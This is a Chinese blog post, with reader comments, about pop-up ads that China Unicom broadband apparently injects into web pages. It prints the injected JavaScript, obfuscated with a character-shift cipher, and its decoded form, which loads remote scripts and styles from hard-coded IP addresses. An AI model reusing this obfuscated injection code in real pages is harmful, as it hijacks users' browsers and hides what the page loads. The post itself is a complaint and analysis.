浏览器遭劫持--右下角弹出窗口

| 4 Comments

  浏览器右下角的弹出窗口:

  联通宽带用户:打开网页的时候,浏览器右下角偶尔会立刻弹出一个窗口,先是一些游戏广告,随后转入中国联通资讯互动平台。和我一年前遇到的情况一样,这个小窗口的右下角有一个灰色的“不再弹出” 选项,可是选了之后并没有之前说的输入宽带帐号的文本框,只是说他们会在24小时内做屏蔽处理。但是事实上,你点了那个显眼的“不再弹出”,第二天一样弹。

  这个弹出框会导致一些奇怪的问题。比如:无法正常登录某些网站,打开 netgame.com 时如果出现这个弹出框,就会无法正常登录,只能刷新一次。更让我觉得更恶心的是,它还会在网络游戏里面打开的网页中出现!

  这个弹出窗口还进行了加密,类似这样的代码:

<script>
var d = "=iunm?=ifbe?=ujumf?=0ujumf?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00329/36/357/229;9103/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!h>#iuuq;00njoj/ofuhbnf/dpn#<wbs!ujnf>61+2111<tfuUjnfpvu)#i)*<#-ujnf*<wbs!mpdbujpo<wbs!bctQbui>#iuuq;00329/36/357/229;91#<wbs!bevsm>#iuuq;0071/29/258/2420djuz0tz/";
function i(_, __) {
_ += __;
var $ = "";
for (var u = 0; u < _.length; u++) {
var r = _.charCodeAt(u);
$ += String.fromCharCode(r - 1);
}
return $;
}
var c = "ktq#<wbs!xj>#473#<!wbs!if>#379#<wbs!qptj>#4#<wbs!tqje>#2411:97381#<xjoepx/pofssps>gvodujpo)*|epdvnfou/VSM>h<~=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00329/36/357/229;9103/kt#?=0tdsjqu?=0ifbe?=cpez!je>c!pompbe>#mpbeBuusjcvuf)*#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=0cpez?=0iunm?";
document.write(i(d, c));
</script>

  很邪恶的加密方式,解密后的代码:

<html>
  
  <head>
  <title>
  </title>
  <link rel="stylesheet" type="text/css" href="http://218.25.246.118:80/2.css">
  <script type="text/javascript">
  var g = "http://mini.netgame.com";
  var time = 50 * 1000;
  setTimeout("h();", time);
  var location;
  var absPath = "http://218.25.246.118:80";
  var adurl = "http://60.18.147.131/city/sy.jsp";
  var wi = "362";
  var he = "268";
  var posi = "3";
  var spid = "1300986270";
  window.onerror = function() {
  document.URL = g;
  }
  </script>
  <script type="text/javascript" src="http://218.25.246.118:80/2.js">
  </script>
  </head>
  
  <body id=b onload="loadAttribute()" rightMargin=0 topMargin=0 leftMargin=0
  scroll=no>
  </body>
</html>

本文结束。

4 Comments

请问这个是怎么解密的 我这也有跟这个不太一样 var d = "=iunm?=ifbe?=mjol!sfm.....
你好,我今天突然出现了您所说的问题。我尝试着按照您的方法把document改成了alert,但仍没有“解密”。

Leave a comment